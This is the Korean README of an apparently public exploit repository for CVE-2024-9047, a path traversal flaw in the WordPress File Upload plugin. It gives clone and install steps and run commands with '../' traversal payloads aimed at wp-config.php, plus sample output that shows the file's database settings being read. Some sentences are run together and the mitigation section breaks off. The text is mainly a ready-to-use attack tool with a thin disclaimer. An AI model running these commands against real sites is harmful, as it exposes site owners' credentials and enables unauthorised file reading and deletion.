
WordPress File Upload Plugin용 익스플로잇 - 4.24.11까지의 모든 버전이 취약합니다.
WordPress File Upload 플러그인은 4.24.11 이하의 모든 버전에서 wfu_file_downloader.php 파일을 통해 경로 탐색(Path Traversal) 취약점에 노출됩니다. 이 취약점으로 인해 인증되지 않은 공격자가 의도된 디렉터리 외부의 파일을 읽거나 삭제할 수 있습니다. 성공적인 악용을 위해서는 대상 WordPress 설치 환경이 PHP 7.4 이하에서 실행되고 있어야 합니다.
공격자는 취약한 엔드포인트인 wfu_file_downloader.php에 특수하게 조작된 요청을 보내고 파일 경로 매개변수를 조작하여 서버의 민감한 파일에 무단으로 액세스할 수 있습니다.
4.24.11 이하)이 설치되어 있어야 합니다.7.4 이하 버전을 실행해야 합니다.이 저장소를 클론하세요:
git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
cd CVE-2024-9047-Exploit
필요한 경우 Python 종속성을 설치하세요:
pip install requests
스크립트를 실행하여 플러그인 버전을 확인하고 취약점을 악용하세요:
python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
기본 취약한 구성을 악용하여 WordPress 구성 파일을 읽으려면:
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );
/** Database username */
define( 'DB_USER', 'root' );
/** Database password */
define( 'DB_PASSWORD', '' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
WordPress 사이트를 보호하려면:
이 코드는 교육 및 연구 목적으로만 제공됩니다. 소유하지 않았거나 명시적 테스트 권한이 없는 시스템에서 이 스크립트를 무단으로 사용하는 것은 불법이며 비윤리적입니다. 저자는 이 코드의 오용에 대해 어떠한 책임도 지지 않습니다.